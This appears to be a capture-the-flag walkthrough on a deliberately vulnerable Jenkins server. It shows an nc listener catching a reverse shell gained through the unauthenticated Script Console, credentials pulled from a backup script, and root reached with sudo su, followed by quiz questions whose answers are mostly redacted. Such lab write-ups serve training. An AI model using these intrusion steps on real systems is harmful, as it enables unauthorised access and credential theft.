Day 12

Defence in depth Sleighing Threats, One Layer at a Time

Learning Objectives

• Defence in Depth

• Basic Endpoint Hardening

• Simple Boot2Root Methodology

We are dealing with a server that is vulnerable by design. It contains misconfigurations and has been implemented with poor or simply nonexistent security practices.

Jenkins Dashboard without authentication

Access to Scrip Console allowing RCE and hence Reverse Shell

──(kali㉿kali)-[~]
└─$ nc -lnvp 6996
listening on [any] 6996 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.63.220] 52726
whoami
jenkins

Successfull Reverse Shell

┌──(kali㉿kali)-[~]
└─$ ssh tracy@10.10.63.220
tracy@10.10.63.220's password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Dec 13 05:20:26 AM UTC 2023

  System load:  0.00537109375     Processes:             114
  Usage of /:   48.0% of 9.75GB   Users logged in:       1
  Memory usage: 37%               IPv4 address for eth0: 10.10.63.220
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

41 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Nov 22 19:59:37 2023 from 10.18.65.106
tracy@jenkins:~$ sudo -l
[sudo] password for tracy: 
Matching Defaults entries for tracy on jenkins:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User tracy may run the following commands on jenkins:
    (ALL : ALL) ALL
    
tracy@jenkins:~$ sudo su
root@jenkins:/home/tracy# 

The (ALL :ALL) ALL line in the output essentially says that all commands can be performed by tracy using sudo. This means that the user is created with inherently privileged access. As such, we can just enter the command sudo su, and we're root!

Jenkins after fixing config file.

What is the default port for Jenkins?
[REDACTED]

What is the password of the user tracy?
[REDACTED]
Can be found in a backupfile.

──(kali㉿kali)-[~]
└─$ nc -lnvp 6996
listening on [any] 6996 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.63.220] 52726
whoami
jenkins
cd /opt/scripts
ls
backup.sh
cat backup.sh
#!/bin/sh
.
.
.
tar czvf /var/lib/jenkins/backup.tar.gz /var/lib/jenkins/backup/
/bin/sleep 5

username=[REDACTED]
password=[REDACTED]

What's the root flag?
[REDACTED]
Can be found when we get root access using tracy's password.

root@jenkins:/# cd root
root@jenkins:~# ls
[REDACTED]  snap
root@jenkins:~# cat flag.txt
[REDACTED]

What is the error message when you login as tracy again and try sudo -l after its removal from the sudoers group?
Sorry, user tracy may not run sudo on jenkins.

What's the SSH flag?
[REDACTED]
Can be found in the SSH config file.

What's the Jenkins flag?
[REDACTED]
Can be found in the backup config file.